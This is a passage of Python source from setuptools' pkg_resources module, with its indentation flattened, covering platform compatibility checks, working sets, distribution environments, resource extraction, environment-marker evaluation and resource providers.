XXX Currently this is the same as ``distutils.util.get_platform()``, but it
needs some hacks for Linux and Mac OS X.
"""
try:
# Python 2.7 or >=3.2
from sysconfig import get_platform
except ImportError:
from distutils.util import get_platform
plat = get_platform()
if sys.platform == "darwin" and not plat.startswith('macosx-'):
try:
version = _macosx_vers()
machine = os.uname()[4].replace(" ", "_")
return "macosx-%d.%d-%s" % (int(version[0]), int(version[1]),
_macosx_arch(machine))
except ValueError:
# if someone is running a non-Mac darwin system, this will fall
# through to the default implementation
pass
return plat
macosVersionString = re.compile(r"macosx-(\d+)\.(\d+)-(.*)")
darwinVersionString = re.compile(r"darwin-(\d+)\.(\d+)\.(\d+)-(.*)")
# XXX backward compat
get_platform = get_build_platform
def compatible_platforms(provided, required):
"""Can code for the `provided` platform run on the `required` platform?
Returns true if either platform is ``None``, or the platforms are equal.
XXX Needs compatibility checks for Linux and other unixy OSes.
"""
if provided is None or required is None or provided==required:
# easy case
return True
# Mac OS X special cases
reqMac = macosVersionString.match(required)
if reqMac:
provMac = macosVersionString.match(provided)
# is this a Mac package?
if not provMac:
# this is backwards compatibility for packages built before
# setuptools 0.6. All packages built after this point will
# use the new macosx designation.
provDarwin = darwinVersionString.match(provided)
if provDarwin:
dversion = int(provDarwin.group(1))
macosversion = "%s.%s" % (reqMac.group(1), reqMac.group(2))
if dversion == 7 and macosversion >= "10.3" or \
dversion == 8 and macosversion >= "10.4":
return True
# egg isn't macosx or legacy darwin
return False
# are they the same major version and machine type?
if provMac.group(1) != reqMac.group(1) or \
provMac.group(3) != reqMac.group(3):
return False
# is the required OS major update >= the provided one?
if int(provMac.group(2)) > int(reqMac.group(2)):
return False
return True
# XXX Linux and other platforms' special cases should go here
return False
def run_script(dist_spec, script_name):
"""Locate distribution `dist_spec` and run its `script_name` script"""
ns = sys._getframe(1).f_globals
name = ns['__name__']
ns.clear()
ns['__name__'] = name
require(dist_spec)[0].run_script(script_name, ns)
# backward compatibility
run_main = run_script
def get_distribution(dist):
"""Return a current distribution object for a Requirement or string"""
if isinstance(dist, string_types):
dist = Requirement.parse(dist)
if isinstance(dist, Requirement):
dist = get_provider(dist)
if not isinstance(dist, Distribution):
raise TypeError("Expected string, Requirement, or Distribution", dist)
return dist
def load_entry_point(dist, group, name):
"""Return `name` entry point of `group` for `dist` or raise ImportError"""
return get_distribution(dist).load_entry_point(group, name)
def get_entry_map(dist, group=None):
"""Return the entry point map for `group`, or the full entry map"""
return get_distribution(dist).get_entry_map(group)
def get_entry_info(dist, group, name):
"""Return the EntryPoint object for `group`+`name`, or ``None``"""
return get_distribution(dist).get_entry_info(group, name)
class IMetadataProvider:
def has_metadata(name):
"""Does the package's distribution contain the named metadata?"""
def get_metadata(name):
"""The named metadata resource as a string"""
def get_metadata_lines(name):
"""Yield named metadata resource as list of non-blank non-comment lines
Leading and trailing whitespace is stripped from each line, and lines
with ``#`` as the first non-blank character are omitted."""
def metadata_isdir(name):
"""Is the named metadata a directory? (like ``os.path.isdir()``)"""
def metadata_listdir(name):
"""List of metadata names in the directory (like ``os.listdir()``)"""
def run_script(script_name, namespace):
"""Execute the named script in the supplied namespace dictionary"""
class IResourceProvider(IMetadataProvider):
"""An object that provides access to package resources"""
def get_resource_filename(manager, resource_name):
"""Return a true filesystem path for `resource_name`
`manager` must be an ``IResourceManager``"""
def get_resource_stream(manager, resource_name):
"""Return a readable file-like object for `resource_name`
`manager` must be an ``IResourceManager``"""
def get_resource_string(manager, resource_name):
"""Return a string containing the contents of `resource_name`
`manager` must be an ``IResourceManager``"""
def has_resource(resource_name):
"""Does the package contain the named resource?"""
def resource_isdir(resource_name):
"""Is the named resource a directory? (like ``os.path.isdir()``)"""
def resource_listdir(resource_name):
"""List of resource names in the directory (like ``os.listdir()``)"""
class WorkingSet(object):
"""A collection of active distributions on sys.path (or a similar list)"""
def __init__(self, entries=None):
"""Create working set from list of path entries (default=sys.path)"""
self.entries = []
self.entry_keys = {}
self.by_key = {}
self.callbacks = []
if entries is None:
entries = sys.path
for entry in entries:
self.add_entry(entry)
@classmethod
def _build_master(cls):
"""
Prepare the master working set.
"""
ws = cls()
try:
from __main__ import __requires__
except ImportError:
# The main program does not list any requirements
return ws
# ensure the requirements are met
try:
ws.require(__requires__)
except VersionConflict:
return cls._build_from_requirements(__requires__)
return ws
@classmethod
def _build_from_requirements(cls, req_spec):
"""
Build a working set from a requirement spec. Rewrites sys.path.
"""
# try it without defaults already on sys.path
# by starting with an empty path
ws = cls([])
reqs = parse_requirements(req_spec)
dists = ws.resolve(reqs, Environment())
for dist in dists:
ws.add(dist)
# add any missing entries from sys.path
for entry in sys.path:
if entry not in ws.entries:
ws.add_entry(entry)
# then copy back to sys.path
sys.path[:] = ws.entries
return ws
def add_entry(self, entry):
"""Add a path item to ``.entries``, finding any distributions on it
``find_distributions(entry, True)`` is used to find distributions
corresponding to the path entry, and they are added. `entry` is
always appended to ``.entries``, even if it is already present.
(This is because ``sys.path`` can contain the same value more than
once, and the ``.entries`` of the ``sys.path`` WorkingSet should always
equal ``sys.path``.)
"""
self.entry_keys.setdefault(entry, [])
self.entries.append(entry)
for dist in find_distributions(entry, True):
self.add(dist, entry, False)
def __contains__(self, dist):
"""True if `dist` is the active distribution for its project"""
return self.by_key.get(dist.key) == dist
def find(self, req):
"""Find a distribution matching requirement `req`
If there is an active distribution for the requested project, this
returns it as long as it meets the version requirement specified by
`req`. But, if there is an active distribution for the project and it
does *not* meet the `req` requirement, ``VersionConflict`` is raised.
If there is no active distribution for the requested project, ``None``
is returned.
"""
dist = self.by_key.get(req.key)
if dist is not None and dist not in req:
# XXX add more info
raise VersionConflict(dist, req)
else:
return dist
def iter_entry_points(self, group, name=None):
"""Yield entry point objects from `group` matching `name`
If `name` is None, yields all entry points in `group` from all
distributions in the working set, otherwise only ones matching
both `group` and `name` are yielded (in distribution order).
"""
for dist in self:
entries = dist.get_entry_map(group)
if name is None:
for ep in entries.values():
yield ep
elif name in entries:
yield entries[name]
def run_script(self, requires, script_name):
"""Locate distribution for `requires` and run `script_name` script"""
ns = sys._getframe(1).f_globals
name = ns['__name__']
ns.clear()
ns['__name__'] = name
self.require(requires)[0].run_script(script_name, ns)
def __iter__(self):
"""Yield distributions for non-duplicate projects in the working set
The yield order is the order in which the items' path entries were
added to the working set.
"""
seen = {}
for item in self.entries:
if item not in self.entry_keys:
# workaround a cache issue
continue
for key in self.entry_keys[item]:
if key not in seen:
seen[key]=1
yield self.by_key[key]
def add(self, dist, entry=None, insert=True, replace=False):
"""Add `dist` to working set, associated with `entry`
If `entry` is unspecified, it defaults to the ``.location`` of `dist`.
On exit from this routine, `entry` is added to the end of the working
set's ``.entries`` (if it wasn't already present).
`dist` is only added to the working set if it's for a project that
doesn't already have a distribution in the set, unless `replace=True`.
If it's added, any callbacks registered with the ``subscribe()`` method
will be called.
"""
if insert:
dist.insert_on(self.entries, entry)
if entry is None:
entry = dist.location
keys = self.entry_keys.setdefault(entry,[])
keys2 = self.entry_keys.setdefault(dist.location,[])
if not replace and dist.key in self.by_key:
# ignore hidden distros
return
self.by_key[dist.key] = dist
if dist.key not in keys:
keys.append(dist.key)
if dist.key not in keys2:
keys2.append(dist.key)
self._added_new(dist)
def resolve(self, requirements, env=None, installer=None,
replace_conflicting=False):
"""List all distributions needed to (recursively) meet `requirements`
`requirements` must be a sequence of ``Requirement`` objects. `env`,
if supplied, should be an ``Environment`` instance. If
not supplied, it defaults to all distributions available within any
entry or distribution in the working set. `installer`, if supplied,
will be invoked with each requirement that cannot be met by an
already-installed distribution; it should return a ``Distribution`` or
``None``.
Unless `replace_conflicting=True`, raises a VersionConflict exception if
any requirements are found on the path that have the correct name but
the wrong version. Otherwise, if an `installer` is supplied it will be
invoked to obtain the correct version of the requirement and activate
it.
"""
# set up the stack
requirements = list(requirements)[::-1]
# set of processed requirements
processed = {}
# key -> dist
best = {}
to_activate = []
# Mapping of requirement to set of distributions that required it;
# useful for reporting info about conflicts.
required_by = collections.defaultdict(set)
while requirements:
# process dependencies breadth-first
req = requirements.pop(0)
if req in processed:
# Ignore cyclic or redundant dependencies
continue
dist = best.get(req.key)
if dist is None:
# Find the best distribution and add it to the map
dist = self.by_key.get(req.key)
if dist is None or (dist not in req and replace_conflicting):
ws = self
if env is None:
if dist is None:
env = Environment(self.entries)
else:
# Use an empty environment and workingset to avoid
# any further conflicts with the conflicting
# distribution
env = Environment([])
ws = WorkingSet([])
dist = best[req.key] = env.best_match(req, ws, installer)
if dist is None:
#msg = ("The '%s' distribution was not found on this "
# "system, and is required by this application.")
#raise DistributionNotFound(msg % req)
# unfortunately, zc.buildout uses a str(err)
# to get the name of the distribution here..
raise DistributionNotFound(req)
to_activate.append(dist)
if dist not in req:
# Oops, the "best" so far conflicts with a dependency
tmpl = "%s is installed but %s is required by %s"
args = dist, req, list(required_by.get(req, []))
raise VersionConflict(tmpl % args)
# push the new requirements onto the stack
new_requirements = dist.requires(req.extras)[::-1]
requirements.extend(new_requirements)
# Register the new requirements needed by req
for new_requirement in new_requirements:
required_by[new_requirement].add(req.project_name)
processed[req] = True
# return list of distros to activate
return to_activate
def find_plugins(self, plugin_env, full_env=None, installer=None,
fallback=True):
"""Find all activatable distributions in `plugin_env`
Example usage::
distributions, errors = working_set.find_plugins(
Environment(plugin_dirlist)
)
# add plugins+libs to sys.path
map(working_set.add, distributions)
# display errors
print('Could not load', errors)
The `plugin_env` should be an ``Environment`` instance that contains
only distributions that are in the project's "plugin directory" or
directories. The `full_env`, if supplied, should be an ``Environment``
contains all currently-available distributions. If `full_env` is not
supplied, one is created automatically from the ``WorkingSet`` this
method is called on, which will typically mean that every directory on
``sys.path`` will be scanned for distributions.
`installer` is a standard installer callback as used by the
``resolve()`` method. The `fallback` flag indicates whether we should
attempt to resolve older versions of a plugin if the newest version
cannot be resolved.
This method returns a 2-tuple: (`distributions`, `error_info`), where
`distributions` is a list of the distributions found in `plugin_env`
that were loadable, along with any other distributions that are needed
to resolve their dependencies. `error_info` is a dictionary mapping
unloadable plugin distributions to an exception instance describing the
error that occurred. Usually this will be a ``DistributionNotFound`` or
``VersionConflict`` instance.
"""
plugin_projects = list(plugin_env)
# scan project names in alphabetic order
plugin_projects.sort()
error_info = {}
distributions = {}
if full_env is None:
env = Environment(self.entries)
env += plugin_env
else:
env = full_env + plugin_env
shadow_set = self.__class__([])
# put all our entries in shadow_set
list(map(shadow_set.add, self))
for project_name in plugin_projects:
for dist in plugin_env[project_name]:
req = [dist.as_requirement()]
try:
resolvees = shadow_set.resolve(req, env, installer)
except ResolutionError:
v = sys.exc_info()[1]
# save error info
error_info[dist] = v
if fallback:
# try the next older version of project
continue
else:
# give up on this project, keep going
break
else:
list(map(shadow_set.add, resolvees))
distributions.update(dict.fromkeys(resolvees))
# success, no need to try any more versions of this project
break
distributions = list(distributions)
distributions.sort()
return distributions, error_info
def require(self, *requirements):
"""Ensure that distributions matching `requirements` are activated
`requirements` must be a string or a (possibly-nested) sequence
thereof, specifying the distributions and versions required. The
return value is a sequence of the distributions that needed to be
activated to fulfill the requirements; all relevant distributions are
included, even if they were already activated in this working set.
"""
needed = self.resolve(parse_requirements(requirements))
for dist in needed:
self.add(dist)
return needed
def subscribe(self, callback):
"""Invoke `callback` for all distributions (including existing ones)"""
if callback in self.callbacks:
return
self.callbacks.append(callback)
for dist in self:
callback(dist)
def _added_new(self, dist):
for callback in self.callbacks:
callback(dist)
def __getstate__(self):
return (
self.entries[:], self.entry_keys.copy(), self.by_key.copy(),
self.callbacks[:]
)
def __setstate__(self, e_k_b_c):
entries, keys, by_key, callbacks = e_k_b_c
self.entries = entries[:]
self.entry_keys = keys.copy()
self.by_key = by_key.copy()
self.callbacks = callbacks[:]
class Environment(object):
"""Searchable snapshot of distributions on a search path"""
def __init__(self, search_path=None, platform=get_supported_platform(),
python=PY_MAJOR):
"""Snapshot distributions available on a search path
Any distributions found on `search_path` are added to the environment.
`search_path` should be a sequence of ``sys.path`` items. If not
supplied, ``sys.path`` is used.
`platform` is an optional string specifying the name of the platform
that platform-specific distributions must be compatible with. If
unspecified, it defaults to the current platform. `python` is an
optional string naming the desired version of Python (e.g. ``'3.3'``);
it defaults to the current version.
You may explicitly set `platform` (and/or `python`) to ``None`` if you
wish to map *all* distributions, not just those compatible with the
running platform or Python version.
"""
self._distmap = {}
self.platform = platform
self.python = python
self.scan(search_path)
def can_add(self, dist):
"""Is distribution `dist` acceptable for this environment?
The distribution must match the platform and python version
requirements specified when this environment was created, or False
is returned.
"""
return (self.python is None or dist.py_version is None
or dist.py_version==self.python) \
and compatible_platforms(dist.platform, self.platform)
def remove(self, dist):
"""Remove `dist` from the environment"""
self._distmap[dist.key].remove(dist)
def scan(self, search_path=None):
"""Scan `search_path` for distributions usable in this environment
Any distributions found are added to the environment.
`search_path` should be a sequence of ``sys.path`` items. If not
supplied, ``sys.path`` is used. Only distributions conforming to
the platform/python version defined at initialization are added.
"""
if search_path is None:
search_path = sys.path
for item in search_path:
for dist in find_distributions(item):
self.add(dist)
def __getitem__(self, project_name):
"""Return a newest-to-oldest list of distributions for `project_name`
Uses case-insensitive `project_name` comparison, assuming all the
project's distributions use their project's name converted to all
lowercase as their key.
"""
distribution_key = project_name.lower()
return self._distmap.get(distribution_key, [])
def add(self, dist):
"""Add `dist` if we ``can_add()`` it and it has not already been added
"""
if self.can_add(dist) and dist.has_version():
dists = self._distmap.setdefault(dist.key, [])
if dist not in dists:
dists.append(dist)
dists.sort(key=operator.attrgetter('hashcmp'), reverse=True)
def best_match(self, req, working_set, installer=None):
"""Find distribution best matching `req` and usable on `working_set`
This calls the ``find(req)`` method of the `working_set` to see if a
suitable distribution is already active. (This may raise
``VersionConflict`` if an unsuitable version of the project is already
active in the specified `working_set`.) If a suitable distribution
isn't active, this method returns the newest distribution in the
environment that meets the ``Requirement`` in `req`. If no suitable
distribution is found, and `installer` is supplied, then the result of
calling the environment's ``obtain(req, installer)`` method will be
returned.
"""
dist = working_set.find(req)
if dist is not None:
return dist
for dist in self[req.key]:
if dist in req:
return dist
# try to download/install
return self.obtain(req, installer)
def obtain(self, requirement, installer=None):
"""Obtain a distribution matching `requirement` (e.g. via download)
Obtain a distro that matches requirement (e.g. via download). In the
base ``Environment`` class, this routine just returns
``installer(requirement)``, unless `installer` is None, in which case
None is returned instead. This method is a hook that allows subclasses
to attempt other ways of obtaining a distribution before falling back
to the `installer` argument."""
if installer is not None:
return installer(requirement)
def __iter__(self):
"""Yield the unique project names of the available distributions"""
for key in self._distmap.keys():
if self[key]:
yield key
def __iadd__(self, other):
"""In-place addition of a distribution or environment"""
if isinstance(other, Distribution):
self.add(other)
elif isinstance(other, Environment):
for project in other:
for dist in other[project]:
self.add(dist)
else:
raise TypeError("Can't add %r to environment" % (other,))
return self
def __add__(self, other):
"""Add an environment or distribution to an environment"""
new = self.__class__([], platform=None, python=None)
for env in self, other:
new += env
return new
# XXX backward compatibility
AvailableDistributions = Environment
class ExtractionError(RuntimeError):
"""An error occurred extracting a resource
The following attributes are available from instances of this exception:
manager
The resource manager that raised this exception
cache_path
The base directory for resource extraction
original_error
The exception instance that caused extraction to fail
"""
class ResourceManager:
"""Manage resource extraction and packages"""
extraction_path = None
def __init__(self):
self.cached_files = {}
def resource_exists(self, package_or_requirement, resource_name):
"""Does the named resource exist?"""
return get_provider(package_or_requirement).has_resource(resource_name)
def resource_isdir(self, package_or_requirement, resource_name):
"""Is the named resource an existing directory?"""
return get_provider(package_or_requirement).resource_isdir(
resource_name
)
def resource_filename(self, package_or_requirement, resource_name):
"""Return a true filesystem path for specified resource"""
return get_provider(package_or_requirement).get_resource_filename(
self, resource_name
)
def resource_stream(self, package_or_requirement, resource_name):
"""Return a readable file-like object for specified resource"""
return get_provider(package_or_requirement).get_resource_stream(
self, resource_name
)
def resource_string(self, package_or_requirement, resource_name):
"""Return specified resource as a string"""
return get_provider(package_or_requirement).get_resource_string(
self, resource_name
)
def resource_listdir(self, package_or_requirement, resource_name):
"""List the contents of the named resource directory"""
return get_provider(package_or_requirement).resource_listdir(
resource_name
)
def extraction_error(self):
"""Give an error message for problems extracting file(s)"""
old_exc = sys.exc_info()[1]
cache_path = self.extraction_path or get_default_cache()
err = ExtractionError("""Can't extract file(s) to egg cache
The following error occurred while trying to extract file(s) to the Python egg
cache:
%s
The Python egg cache directory is currently set to:
%s
Perhaps your account does not have write access to this directory? You can
change the cache directory by setting the PYTHON_EGG_CACHE environment
variable to point to an accessible directory.
""" % (old_exc, cache_path)
)
err.manager = self
err.cache_path = cache_path
err.original_error = old_exc
raise err
def get_cache_path(self, archive_name, names=()):
"""Return absolute location in cache for `archive_name` and `names`
The parent directory of the resulting path will be created if it does
not already exist. `archive_name` should be the base filename of the
enclosing egg (which may not be the name of the enclosing zipfile!),
including its ".egg" extension. `names`, if provided, should be a
sequence of path name parts "under" the egg's extraction location.
This method should only be called by resource providers that need to
obtain an extraction location, and only for names they intend to
extract, as it tracks the generated names for possible cleanup later.
"""
extract_path = self.extraction_path or get_default_cache()
target_path = os.path.join(extract_path, archive_name+'-tmp', *names)
try:
_bypass_ensure_directory(target_path)
except:
self.extraction_error()
self._warn_unsafe_extraction_path(extract_path)
self.cached_files[target_path] = 1
return target_path
@staticmethod
def _warn_unsafe_extraction_path(path):
"""
If the default extraction path is overridden and set to an insecure
location, such as /tmp, it opens up an opportunity for an attacker to
replace an extracted file with an unauthorized payload. Warn the user
if a known insecure location is used.
See Distribute #375 for more details.
"""
if os.name == 'nt' and not path.startswith(os.environ['windir']):
# On Windows, permissions are generally restrictive by default
# and temp directories are not writable by other users, so
# bypass the warning.
return
mode = os.stat(path).st_mode
if mode & stat.S_IWOTH or mode & stat.S_IWGRP:
msg = ("%s is writable by group/others and vulnerable to attack "
"when "
"used with get_resource_filename. Consider a more secure "
"location (set with .set_extraction_path or the "
"PYTHON_EGG_CACHE environment variable)." % path)
warnings.warn(msg, UserWarning)
def postprocess(self, tempname, filename):
"""Perform any platform-specific postprocessing of `tempname`
This is where Mac header rewrites should be done; other platforms don't
have anything special they should do.
Resource providers should call this method ONLY after successfully
extracting a compressed resource. They must NOT call it on resources
that are already in the filesystem.
`tempname` is the current (temporary) name of the file, and `filename`
is the name it will be renamed to by the caller after this routine
returns.
"""
if os.name == 'posix':
# Make the resource executable
mode = ((os.stat(tempname).st_mode) | 0o555) & 0o7777
os.chmod(tempname, mode)
def set_extraction_path(self, path):
"""Set the base path where resources will be extracted to, if needed.
If you do not call this routine before any extractions take place, the
path defaults to the return value of ``get_default_cache()``. (Which
is based on the ``PYTHON_EGG_CACHE`` environment variable, with various
platform-specific fallbacks. See that routine's documentation for more
details.)
Resources are extracted to subdirectories of this path based upon
information given by the ``IResourceProvider``. You may set this to a
temporary directory, but then you must call ``cleanup_resources()`` to
delete the extracted files when done. There is no guarantee that
``cleanup_resources()`` will be able to remove all extracted files.
(Note: you may not change the extraction path for a given resource
manager once resources have been extracted, unless you first call
``cleanup_resources()``.)
"""
if self.cached_files:
raise ValueError(
"Can't change extraction path, files already extracted"
)
self.extraction_path = path
def cleanup_resources(self, force=False):
"""
Delete all extracted resource files and directories, returning a list
of the file and directory names that could not be successfully removed.
This function does not have any concurrency protection, so it should
generally only be called when the extraction path is a temporary
directory exclusive to a single process. This method is not
automatically called; you must call it explicitly or register it as an
``atexit`` function if you wish to ensure cleanup of a temporary
directory used for extractions.
"""
# XXX
def get_default_cache():
"""Determine the default cache location
This returns the ``PYTHON_EGG_CACHE`` environment variable, if set.
Otherwise, on Windows, it returns a "Python-Eggs" subdirectory of the
"Application Data" directory. On all other systems, it's "~/.python-eggs".
"""
try:
return os.environ['PYTHON_EGG_CACHE']
except KeyError:
pass
if os.name!='nt':
return os.path.expanduser('~/.python-eggs')
# XXX this may be locale-specific!
app_data = 'Application Data'
app_homes = [
# best option, should be locale-safe
(('APPDATA',), None),
(('USERPROFILE',), app_data),
(('HOMEDRIVE','HOMEPATH'), app_data),
(('HOMEPATH',), app_data),
(('HOME',), None),
# 95/98/ME
(('WINDIR',), app_data),
]
for keys, subdir in app_homes:
dirname = ''
for key in keys:
if key in os.environ:
dirname = os.path.join(dirname, os.environ[key])
else:
break
else:
if subdir:
dirname = os.path.join(dirname, subdir)
return os.path.join(dirname, 'Python-Eggs')
else:
raise RuntimeError(
"Please set the PYTHON_EGG_CACHE enviroment variable"
)
def safe_name(name):
"""Convert an arbitrary string to a standard distribution name
Any runs of non-alphanumeric/. characters are replaced with a single '-'.
"""
return re.sub('[^A-Za-z0-9.]+', '-', name)
def safe_version(version):
"""
Convert an arbitrary string to a standard version string
"""
try:
# normalize the version
return str(packaging.version.Version(version))
except packaging.version.InvalidVersion:
version = version.replace(' ','.')
return re.sub('[^A-Za-z0-9.]+', '-', version)
def safe_extra(extra):
"""Convert an arbitrary string to a standard 'extra' name
Any runs of non-alphanumeric characters are replaced with a single '_',
and the result is always lowercased.
"""
return re.sub('[^A-Za-z0-9.]+', '_', extra).lower()
def to_filename(name):
"""Convert a project or version name to its filename-escaped form
Any '-' characters are currently replaced with '_'.
"""
return name.replace('-','_')
class MarkerEvaluation(object):
values = {
'os_name': lambda: os.name,
'sys_platform': lambda: sys.platform,
'python_full_version': platform.python_version,
'python_version': lambda: platform.python_version()[:3],
'platform_version': platform.version,
'platform_machine': platform.machine,
'python_implementation': platform.python_implementation,
}
@classmethod
def is_invalid_marker(cls, text):
"""
Validate text as a PEP 426 environment marker; return an exception
if invalid or False otherwise.
"""
try:
cls.evaluate_marker(text)
except SyntaxError:
return cls.normalize_exception(sys.exc_info()[1])
return False
@staticmethod
def normalize_exception(exc):
"""
Given a SyntaxError from a marker evaluation, normalize the error
message:
- Remove indications of filename and line number.
- Replace platform-specific error messages with standard error
messages.
"""
subs = {
'unexpected EOF while parsing': 'invalid syntax',
'parenthesis is never closed': 'invalid syntax',
}
exc.filename = None
exc.lineno = None
exc.msg = subs.get(exc.msg, exc.msg)
return exc
@classmethod
def and_test(cls, nodelist):
# MUST NOT short-circuit evaluation, or invalid syntax can be skipped!
items = [
cls.interpret(nodelist[i])
for i in range(1, len(nodelist), 2)
]
return functools.reduce(operator.and_, items)
@classmethod
def test(cls, nodelist):
# MUST NOT short-circuit evaluation, or invalid syntax can be skipped!
items = [
cls.interpret(nodelist[i])
for i in range(1, len(nodelist), 2)
]
return functools.reduce(operator.or_, items)
@classmethod
def atom(cls, nodelist):
t = nodelist[1][0]
if t == token.LPAR:
if nodelist[2][0] == token.RPAR:
raise SyntaxError("Empty parentheses")
return cls.interpret(nodelist[2])
msg = "Language feature not supported in environment markers"
raise SyntaxError(msg)
@classmethod
def comparison(cls, nodelist):
if len(nodelist) > 4:
msg = "Chained comparison not allowed in environment markers"
raise SyntaxError(msg)
comp = nodelist[2][1]
cop = comp[1]
if comp[0] == token.NAME:
if len(nodelist[2]) == 3:
if cop == 'not':
cop = 'not in'
else:
cop = 'is not'
try:
cop = cls.get_op(cop)
except KeyError:
msg = repr(cop) + " operator not allowed in environment markers"
raise SyntaxError(msg)
return cop(cls.evaluate(nodelist[1]), cls.evaluate(nodelist[3]))
@classmethod
def get_op(cls, op):
ops = {
symbol.test: cls.test,
symbol.and_test: cls.and_test,
symbol.atom: cls.atom,
symbol.comparison: cls.comparison,
'not in': lambda x, y: x not in y,
'in': lambda x, y: x in y,
'==': operator.eq,
'!=': operator.ne,
}
if hasattr(symbol, 'or_test'):
ops[symbol.or_test] = cls.test
return ops[op]
@classmethod
def evaluate_marker(cls, text, extra=None):
"""
Evaluate a PEP 426 environment marker on CPython 2.4+.
Return a boolean indicating the marker result in this environment.
Raise SyntaxError if marker is invalid.
This implementation uses the 'parser' module, which is not implemented
on
Jython and has been superseded by the 'ast' module in Python 2.6 and
later.
"""
return cls.interpret(parser.expr(text).totuple(1)[1])
@classmethod
def _markerlib_evaluate(cls, text):
"""
Evaluate a PEP 426 environment marker using markerlib.
Return a boolean indicating the marker result in this environment.
Raise SyntaxError if marker is invalid.
"""
import _markerlib
# markerlib implements Metadata 1.2 (PEP 345) environment markers.
# Translate the variables to Metadata 2.0 (PEP 426).
env = _markerlib.default_environment()
for key in env.keys():
new_key = key.replace('.', '_')
env[new_key] = env.pop(key)
try:
result = _markerlib.interpret(text, env)
except NameError:
e = sys.exc_info()[1]
raise SyntaxError(e.args[0])
return result
if 'parser' not in globals():
# Fall back to less-complete _markerlib implementation if 'parser' module
# is not available.
evaluate_marker = _markerlib_evaluate
@classmethod
def interpret(cls, nodelist):
while len(nodelist)==2: nodelist = nodelist[1]
try:
op = cls.get_op(nodelist[0])
except KeyError:
raise SyntaxError("Comparison or logical expression expected")
return op(nodelist)
@classmethod
def evaluate(cls, nodelist):
while len(nodelist)==2: nodelist = nodelist[1]
kind = nodelist[0]
name = nodelist[1]
if kind==token.NAME:
try:
op = cls.values[name]
except KeyError:
raise SyntaxError("Unknown name %r" % name)
return op()
if kind==token.STRING:
s = nodelist[1]
if not cls._safe_string(s):
raise SyntaxError(
"Only plain strings allowed in environment markers")
return s[1:-1]
msg = "Language feature not supported in environment markers"
raise SyntaxError(msg)
@staticmethod
def _safe_string(cand):
return (
cand[:1] in "'\"" and
not cand.startswith('"""') and
not cand.startswith("'''") and
'\\' not in cand
)
invalid_marker = MarkerEvaluation.is_invalid_marker
evaluate_marker = MarkerEvaluation.evaluate_marker
class NullProvider:
"""Try to implement resources and metadata for arbitrary PEP 302 loaders"""
egg_name = None
egg_info = None
loader = None
def __init__(self, module):
self.loader = getattr(module, '__loader__', None)
self.module_path = os.path.dirname(getattr(module, '__file__', ''))
def get_resource_filename(self, manager, resource_name):
return self._fn(self.module_path, resource_name)
def get_resource_stream(self, manager, resource_name):
return io.BytesIO(self.get_resource_string(manager, resource_name))
def get_resource_string(self, manager, resource_name):
return self._get(self._fn(self.module_path, resource_name))
def has_resource(self, resource_name):
return self._has(self._fn(self.module_path, resource_name))
def has_metadata(self, name):
return self.egg_info and self._has(self._fn(self.egg_info, name))
if sys.version_info <= (3,):
def get_metadata(self, name):
if not self.egg_info:
return ""
return self._get(self._fn(self.egg_info, name))
else:
def get_metadata(self, name):
if not self.egg_info:
return ""
return self._get(self._fn(self.egg_info, name)).decode("utf-8")
def get_metadata_lines(self, name):
return yield_lines(self.get_metadata(name))
def resource_isdir(self, resource_name):
return self._isdir(self._fn(self.module_path, resource_name))
def metadata_isdir(self, name):
return self.egg_info and self._isdir(self._fn(self.egg_info, name))
def resource_listdir(self, resource_name):
return self._listdir(self._fn(self.module_path, resource_name))
def metadata_listdir(self, name):
if self.egg_info:
return self._listdir(self._fn(self.egg_info, name))
return []
def run_script(self, script_name, namespace):
script = 'scripts/'+script_name
if not self.has_metadata(script):
raise ResolutionError("No script named %r" % script_name)
script_text = self.get_metadata(script).replace('\r\n', '\n')
script_text = script_text.replace('\r', '\n')
script_filename = self._fn(self.egg_info, script)
namespace['__file__'] = script_filename
if os.path.exists(script_filename):
source = open(script_filename).read()
code = compile(source, script_filename, 'exec')
exec(code, namespace, namespace)
else:
from linecache import cache
cache[script_filename] = (
len(script_text), 0, script_text.split('\n'), script_filename
)
script_code = compile(script_text, script_filename,'exec')
exec(script_code, namespace, namespace)
def _has(self, path):
raise NotImplementedError(
"Can't perform this operation for unregistered loader type"
)
def _isdir(self, path):
raise NotImplementedError(
"Can't perform this operation for unregistered loader type"
)
def _listdir(self, path):
raise NotImplementedError(
"Can't perform this operation for unregistered loader type"
)
def _fn(self, base, resource_name):
if resource_name:
return os.path.join(base, *resource_name.split('/'))
return base
def _get(self, path):
if hasattr(self.loader, 'get_data'):
return self.loader.get_data(path)
raise NotImplementedError(
"Can't perform this operation for loaders without 'get_data()'"
)
register_loader_type(object, NullProvider)
class EggProvider(NullProvider):
"""Provider based on a virtual filesystem"""
def __init__(self, module):
NullProvider.__init__(self, module)
self._setup_prefix()
def _setup_prefix(self):
# we assume here that our metadata may be nested inside a "basket"
# of multiple eggs; that's why we use module_path instead of .archive
path = self.module_path
old = None
while path!=old:
if path.lower().endswith('.egg'):
self.egg_name = os.path.basename(path)
self.egg_info = os.path.join(path, 'EGG-INFO')
self.egg_root = path
break
old = path
path, base = os.path.split(path)
class DefaultProvider(EggProvider):
"""Provides access to package resources in the filesystem"""
def _has(self, path):
return os.path.exists(path)
def _isdir(self, path):
return os.path.isdir(path)
def _listdir(self, path):
return os.listdir(path)
def get_resource_stream(self, manager, resource_name):
return open(self._fn(self.module_path, resource_name), 'rb')
def _get(self, path):
with open(path, 'rb') as stream:
return stream.read()
register_loader_type(type(None), DefaultProvider)
if importlib_bootstrap is not None:
register_loader_type(importlib_bootstrap.SourceFileLoader, DefaultProvider)
class EmptyProvider(NullProvider):
"""Provider that returns nothing for all requests"""
_isdir = _has = lambda self, path: False
_get = lambda self, path: ''
_listdir = lambda self, path: []
module_path = None
def __init__(self):
pass
empty_provider = EmptyProvider()
class ZipManifests(dict):
"""
zip manifest builder
"""
@classmethod
def build(cls, path):
"""
Build a dictionary similar to the zipimport directory
caches, except instead of tuples, store ZipInfo objects.
Use a platform-specific path separator (os.sep) for the path keys
for compatibility with pypy on Windows.
"""
with ContextualZipFile(path) as zfile:
items = (
(
name.replace('/', os.sep),
zfile.getinfo(name),
)
for name in zfile.namelist()
)
return dict(items)
load = build
class MemoizedZipManifests(ZipManifests):
"""
Memoized zipfile manifests.
"""
manifest_mod = collections.namedtuple('manifest_mod', 'manifest mtime')
def load(self, path):
"""
Load a manifest at path or return a suitable manifest already loaded.
"""
path = os.path.normpath(path)
mtime = os.stat(path).st_mtime
if path not in self or self[path].mtime != mtime:
manifest = self.build(path)
self[path] = self.manifest_mod(manifest, mtime)
return self[path].manifest
class ContextualZipFile(zipfile.ZipFile):
"""
